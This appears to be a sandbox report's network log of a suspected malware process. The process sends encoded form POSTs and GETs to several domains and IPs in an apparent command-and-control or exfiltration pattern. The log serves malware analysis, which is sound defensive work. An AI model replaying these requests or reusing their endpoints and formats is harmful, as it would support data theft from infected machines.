                                                                  Nov 22, 2024 14:46:13.601231098 CET | 558               | OUT       | GET /y3dc/?NjHpTfh=ihLGZn7rk3oJmiI0qHBJyF4us9aj83dk38RHqm5p8i+Dx9088FhrC90fflTIanmBNHjorQ8RX0lkasPQ9tRERiLp2a4b9y8ndNk9xgL1b55xNz3Mr8JVSoFw+CxXG/tVnA==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.migorengya8.click
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:46:14.897952080 CET | 1033              | IN        | HTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 796
                                                                  date: Fri, 22 Nov 2024 13:46:14 GMT
                                                                  server: LiteSpeed
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div></body></html>


                                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                  21         | 192.168.2.8 | 49729       | 103.224.182.242 | 80               | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp                           | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:21.224944115 CET | 801               | OUT       | POST /3m3e/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.klohk.tech
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.klohk.tech
                                                                  Referer: http://www.klohk.tech/3m3e/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=NEUQnq9Sab7mzuQRE4SfuRyxbefXuw5m/nY7DcRY6x59VxSqXWEi+/xWO4NKNmjVyosyI447HN5aGQvNkHYvG+kzblprphMwuA68OTvt8ZAaw71RcG6X2+IQab0V2ktoTp3yrLxvizNvgSy0DsGZv4kQ9Bf6R95ymgprYweQzdhLFovz0fMkb+MteP3qhjA+c7Lze3M=
                                                                  Nov 22, 2024 14:46:22.583301067 CET | 871               | IN        | HTTP/1.1 200 OK
                                                                  date: Fri, 22 Nov 2024 13:46:22 GMT
                                                                  server: Apache
                                                                  set-cookie: __tad=1732283182.2614315; expires=Mon, 20-Nov-2034 13:46:22 GMT; Max-Age=315360000
                                                                  vary: Accept-Encoding
                                                                  content-encoding: gzip
                                                                  content-length: 576
                                                                  content-type: text/html; charset=UTF-8
                                                                  connection: close


                                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                  22         | 192.168.2.8 | 49730       | 103.224.182.242 | 80               | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp                           | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:23.882862091 CET | 821               | OUT       | POST /3m3e/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.klohk.tech
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.klohk.tech
                                                                  Referer: http://www.klohk.tech/3m3e/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=NEUQnq9Sab7mwNYRI/Gf5hy2eefX7g5i/nE7Dfd29EJ9VQiqUXEi9/xWGYMADGibyoxRI6c7HOFaGRfNk2YsX+kxXFpp0xMwuA68OSLT8ZoaxKFRcn6U/eIPdb0VyktkTp2VrKdJi1BvgXe0DeuW2Ikeixe9cck3oylFRh6g/8FqEeeZu9EiY+kGeMfckUdWGYbDAgZPHGFe1bum15dSSylzKorZ
                                                                  Nov 22, 2024 14:46:25.163870096 CET | 871               | IN        | HTTP/1.1 200 OK
                                                                  date: Fri, 22 Nov 2024 13:46:24 GMT
                                                                  server: Apache
                                                                  set-cookie: __tad=1732283184.1678705; expires=Mon, 20-Nov-2034 13:46:24 GMT; Max-Age=315360000
                                                                  vary: Accept-Encoding
                                                                  content-encoding: gzip
                                                                  content-length: 576
                                                                  content-type: text/html; charset=UTF-8
                                                                  connection: close


                                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                  23         | 192.168.2.8 | 49731       | 103.224.182.242 | 80               | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp                           | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:26.546710014 CET | 1838              | OUT       | POST /3m3e/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.klohk.tech
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.klohk.tech
                                                                  Referer: http://www.klohk.tech/3m3e/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Ascii: NjHpTfh=NEUQnq9Sab7mwNYRI/Gf5hy2eefX7g5i/nE7Dfd29EB9ViaqSEsi8/xWaIMNDGjHyooYI6QFHIBaGzXNiCssOukxflpqphMpuAq4OSbT8ZoaxJdRe26U5eIQab0n2kszTtTqrKp/+Vhvg2y0Q7aW+Ikchxefcco8oy5zRhOZ/7xqEoflycV+CMIPRerlsEREY4jvJQksKxNt3Kyvno4ZBEJ+GueXayxIQAxsWdIs/nLTonRXoc5SCWBkArBAh98Hzc0IG2GbYMICxIRgJPrQgkDBFkDtZuZNQXQbQdQoHv+QXZhLfaWPX8n7JnuUzF/M+MxNil92ylKcQorDdaB5X0oFi6ck2qtpV4nOzptq+AkBtIej8+XllOWliu1+DI78/UO/dwH/sGcGeOPSipCaQnrQOB1SOzkQioK4cxR++8ph4iGsvXi42Bm1mx90KnDCLgUdVURqMtX644Zp6imyVWuq1WGI4v9/JtZE8Go/ervCkfSfboo66tKOojIENU1RRGTA2Ge21XMg0EQDuNoWvjuTasnfE+V5jWmPLcIOEvB9tpKYeozvesFKcnXEO21zmjqPZRhd93+aH6dw5VVervG5EuylvJ9eRzHjChsSCZPVnBIBbvskaT4Vrd/0TEyqrn9rrN9z60okgpzYjyzNj3hU0V+3xmkP0AQPH03UdB2QWOadlhBWbS5w1witpzWzDJmZTjSuOX9CBO8kMtYX6rHWaHbYugApgxHYi2QEGaWUuEXWGM6aYgcythBqy7fQxz/z2NELDyWVPFUIWBncX9Z8/wZFzvfE3a3n7R1ebBZ8sDbSKm1gMjZ8Yc4S2rnh2hCmnfsjxvqOUa2zcZe4ZccVEMZXcHl6Y7d6VUqvTXtAZ4Jp+jRZf7zMECyKsO6iEuR2YoDBYKfd2mdlPCJ5ki9zkDHFGuniH/fNr1TYWAfmuVzxHYPZQ2PUArnO/odbIhRYZ/9paITeCDIv2WJQaUvAl464VkT5fEoMq54nYANs [TRUNCATED]
                                                                  Nov 22, 2024 14:46:27.865304947 CET | 871               | IN        | HTTP/1.1 200 OK
                                                                  date: Fri, 22 Nov 2024 13:46:27 GMT
                                                                  server: Apache
                                                                  set-cookie: __tad=1732283187.3556796; expires=Mon, 20-Nov-2034 13:46:27 GMT; Max-Age=315360000
                                                                  vary: Accept-Encoding
                                                                  content-encoding: gzip
                                                                  content-length: 576
                                                                  content-type: text/html; charset=UTF-8
                                                                  connection: close


                                                                  Session ID | Source IP   | Source Port | Destination IP  | Destination Port | PID  | Process
                                                                  24         | 192.168.2.8 | 49732       | 103.224.182.242 | 80               | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp                           | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:29.195655107 CET | 551               | OUT       | GET /3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.klohk.tech
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:46:30.465423107 CET | 1236              | IN        | HTTP/1.1 200 OK
                                                                  date: Fri, 22 Nov 2024 13:46:30 GMT
                                                                  server: Apache
                                                                  set-cookie: __tad=1732283190.6287925; expires=Mon, 20-Nov-2034 13:46:30 GMT; Max-Age=315360000
                                                                  vary: Accept-Encoding
                                                                  content-length: 1529
                                                                  content-type: text/html; charset=UTF-8
                                                                  connection: close
                                                                  Data Ascii: <html><head><title>klohk.tech</title><script type="text/javascript" src="/js/fingerprint/iife.min.js"></script><script type="text/javascript">var redirect_link = 'http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF14svyhH44dt&';// Set a timeout of 300 microseconds to execute a redirect if the fingerprint promise fails for some reasonfunction fallbackRedirect() {window.location.replace(redirect_link+'fp=-7');}try {const rdrTimeout = setTimeout(fallbackRedirect, 300);var fpPromise = FingerprintJS.load({monitoring: false});fpPromise.then(fp => fp.get()).then(result => { var fprt = 'fp='+result.visitorId;clearTimeout(rdrTimeout);window.location.replace(redirect_link+fprt);});} catch(err) {fallbackRedirect();}</script><style> body { background:#101c36 } </style></head><body bgco
                                                                  Nov 22, 2024 14:46:30.465539932 CET | 565               | IN        | Data Raw: 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 27 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 27 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 6b 6c 6f 68
                                                                  Data Ascii: lor="#ffffff" text="#000000"><div style='display: none;'><a href='http://www.klohk.tech/3m3e/?NjHpTfh=AG8wkc12D4O4qfE3dc2ZpUKPRZyp2gRu+0k6EtFb5UlufQ+lVXFR/9gePpQjCGKa/ZsQJ4MYKcJmAxrfjl4cNftXSlpvpmQYoxqRDgL404wqyKQKR0qu5cYpfr80+FdsRQ==&1fo=GF1


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  25 | 192.168.2.8 | 49733 | 154.23.184.218 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:36.529112101 CET | 798 | OUT | POST /rqnz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.d63dm.top
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.d63dm.top
                                                                  Referer: http://www.d63dm.top/rqnz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 61 66 6f 73 42 6b 32 31 64 2f 51 45 53 44 4e 43 6a 79 46 4c 57 38 33 37 47 37 77 48 33 2f 44 44 68 7a 43 5a 52 31 4e 38 43 58 74 67 2b 67 4b 2b 34 4f 6d 37 74 73 71 65 33 62 4d 68 4f 62 49 33 38 50 76 7a 37 46 61 55 6a 61 30 2f 62 66 53 47 56 39 2b 2b 57 4a 42 6b 68 4a 6f 2b 6f 39 56 78 76 7a 65 39 72 68 70 67 36 2b 76 4b 4f 68 61 50 62 54 79 73 4b 35 70 5a 4f 73 74 32 32 42 38 69 54 45 4d 68 44 48 55 7a 4f 53 4a 4c 6a 59 6c 65 52 44 49 6d 50 38 77 2b 68 6a 4e 69 5a 45 6d 6b 7a 50 52 6e 32 55 7a 47 71 71 6b 6b 32 32 49 47 73 68 37 59 5a 44 4b 47 42 47 30 3d
                                                                  Data Ascii: NjHpTfh=24JOOXJ8e4hNafosBk21d/QESDNCjyFLW837G7wH3/DDhzCZR1N8CXtg+gK+4Om7tsqe3bMhObI38Pvz7FaUja0/bfSGV9++WJBkhJo+o9Vxvze9rhpg6+vKOhaPbTysK5pZOst22B8iTEMhDHUzOSJLjYleRDImP8w+hjNiZEmkzPRn2UzGqqkk22IGsh7YZDKGBG0=
                                                                  Nov 22, 2024 14:46:38.089654922 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:37 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 138
                                                                  Connection: close
                                                                  ETag: "669137aa-8a"
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  26 | 192.168.2.8 | 49734 | 154.23.184.218 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:39.191097975 CET | 818 | OUT | POST /rqnz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.d63dm.top
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 228
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.d63dm.top
                                                                  Referer: http://www.d63dm.top/rqnz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 62 2f 59 73 4f 6c 32 31 49 50 51 48 64 6a 4e 43 6f 53 46 50 57 38 72 37 47 36 45 58 33 73 6e 44 68 53 79 5a 51 78 5a 38 46 58 74 67 78 41 4b 33 31 75 6d 4b 74 73 57 57 33 61 41 68 4f 62 73 33 38 4f 66 7a 34 79 47 54 69 4b 30 35 55 2f 53 45 4b 74 2b 2b 57 4a 42 6b 68 4a 73 59 6f 39 74 78 76 6d 4f 39 78 45 56 6a 30 65 76 4a 65 78 61 50 4b 44 79 6f 4b 35 70 6e 4f 74 68 50 32 48 67 69 54 41 49 68 44 56 38 77 46 53 4a 4e 73 34 6c 41 58 7a 68 71 41 73 59 72 67 54 4d 48 64 6e 61 67 79 35 67 4e 73 32 37 41 70 71 4d 50 32 31 67 77 70 57 6d 77 44 67 61 32 66 52 6a 34 4b 75 47 75 59 4b 78 32 6b 52 4f 59 59 7a 6c 79 69 49 61 32
                                                                  Data Ascii: NjHpTfh=24JOOXJ8e4hNb/YsOl21IPQHdjNCoSFPW8r7G6EX3snDhSyZQxZ8FXtgxAK31umKtsWW3aAhObs38Ofz4yGTiK05U/SEKt++WJBkhJsYo9txvmO9xEVj0evJexaPKDyoK5pnOthP2HgiTAIhDV8wFSJNs4lAXzhqAsYrgTMHdnagy5gNs27ApqMP21gwpWmwDga2fRj4KuGuYKx2kROYYzlyiIa2
                                                                  Nov 22, 2024 14:46:40.800514936 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:40 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 138
                                                                  Connection: close
                                                                  ETag: "669137aa-8a"
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  27 | 192.168.2.8 | 49735 | 154.23.184.218 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:41.854500055 CET | 1835 | OUT | POST /rqnz/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.d63dm.top
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 1244
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.d63dm.top
                                                                  Referer: http://www.d63dm.top/rqnz/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 32 34 4a 4f 4f 58 4a 38 65 34 68 4e 62 2f 59 73 4f 6c 32 31 49 50 51 48 64 6a 4e 43 6f 53 46 50 57 38 72 37 47 36 45 58 33 73 76 44 67 67 4b 5a 66 32 31 38 45 58 74 67 76 77 4b 36 31 75 6d 58 74 73 2b 53 33 61 63 62 4f 5a 45 33 39 73 48 7a 76 7a 47 54 73 36 30 35 52 50 53 48 56 39 2b 52 57 49 78 67 68 4a 63 59 6f 39 74 78 76 6e 2b 39 2f 42 70 6a 32 65 76 4b 4f 68 61 39 62 54 7a 50 4b 36 59 63 4f 74 31 41 32 52 51 69 64 41 59 68 46 6d 55 77 49 53 4a 50 6c 6f 6b 54 58 7a 38 6f 41 73 56 46 67 51 52 73 64 6e 69 67 7a 38 42 38 78 30 54 5a 2b 72 4e 2b 32 45 70 54 74 6c 43 4d 44 67 57 45 56 67 66 39 41 4a 71 56 56 59 6c 6c 7a 54 44 64 44 6c 4a 48 6a 64 6e 56 5a 75 47 4e 52 6e 43 77 7a 65 30 78 51 48 70 66 39 50 52 50 42 30 75 43 55 7a 72 52 78 75 4c 63 53 50 4a 58 71 65 33 38 64 66 49 72 33 48 64 54 4c 2f 6c 61 72 73 37 42 54 59 77 68 67 38 31 74 78 51 4b 31 37 39 6a 36 72 4c 71 74 59 73 75 52 58 6b 6a 4d 32 38 56 79 6f 53 4d 4c 33 74 38 65 76 51 36 78 42 35 49 67 36 6f 6a 66 65 5a [TRUNCATED]
                                                                  Data Ascii: NjHpTfh=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 [TRUNCATED]
                                                                  Nov 22, 2024 14:46:43.418164968 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:43 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 138
                                                                  Connection: close
                                                                  ETag: "669137aa-8a"
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  28 | 192.168.2.8 | 49736 | 154.23.184.218 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:44.510334969 CET | 550 | OUT | GET /rqnz/?NjHpTfh=76huNjt+Arc+fPcCbUr8ZcsQaHE6oyRuYOqfGZIequmDvyuWFmMJMF1Z7BKJ7tjr9vaKr64/B4AayP3kwCu5tZILeOOALNuMLpp3tbYRhrZPyWqW3RF19Jr1EDacfA/CTw==&1fo=GF14svyhH44dt HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.d63dm.top
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Nov 22, 2024 14:46:46.132545948 CET | 302 | IN | HTTP/1.1 404 Not Found
                                                                  Server: nginx
                                                                  Date: Fri, 22 Nov 2024 13:46:45 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 138
                                                                  Connection: close
                                                                  ETag: "669137aa-8a"
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                  29 | 192.168.2.8 | 49737 | 31.31.196.17 | 80 | 1240 | C:\Program Files (x86)\jupCyaZDEYaMktXkMIVVtozRrAPkkVYrNNVAPNAouqQtQmhWwSoqIzjzYYAHZwwQMvInUdlRiRJTXV\eLiCpwzRIeWAs.exe
                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                  Nov 22, 2024 14:46:51.763345957 CET | 813 | OUT | POST /h26k/ HTTP/1.1
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Host: www.servannto.site
                                                                  Connection: close
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Content-Length: 208
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.servannto.site
                                                                  Referer: http://www.servannto.site/h26k/
                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                  Data Raw: 4e 6a 48 70 54 66 68 3d 36 44 4c 75 36 51 4d 4d 31 6a 61 6d 4b 66 4a 4c 57 45 76 65 64 2b 44 72 46 65 77 37 58 44 7a 4d 56 4f 75 51 44 57 59 43 78 6b 47 70 6f 33 33 44 75 46 35 67 36 2b 58 35 64 73 45 42 46 69 52 42 45 35 2f 79 55 6f 52 4e 4c 4f 4e 66 76 35 78 68 44 6f 79 2f 44 59 65 6a 37 52 6f 35 51 59 61 65 4e 50 50 32 4b 59 4f 39 73 7a 53 6a 4e 78 77 66 6f 77 75 64 6c 32 47 4a 6a 32 38 7a 7a 46 4f 57 31 57 34 36 72 76 70 2b 43 65 35 55 71 30 6e 54 35 46 38 4f 36 69 4d 68 54 79 57 2f 2f 72 75 2b 74 4a 48 6a 6d 56 68 54 45 71 59 74 70 47 6b 35 4b 4b 71 50 61 56 4d 39 4b 6f 2f 41 48 2f 30 78 6b 71 45 4c 54 61 6f 3d
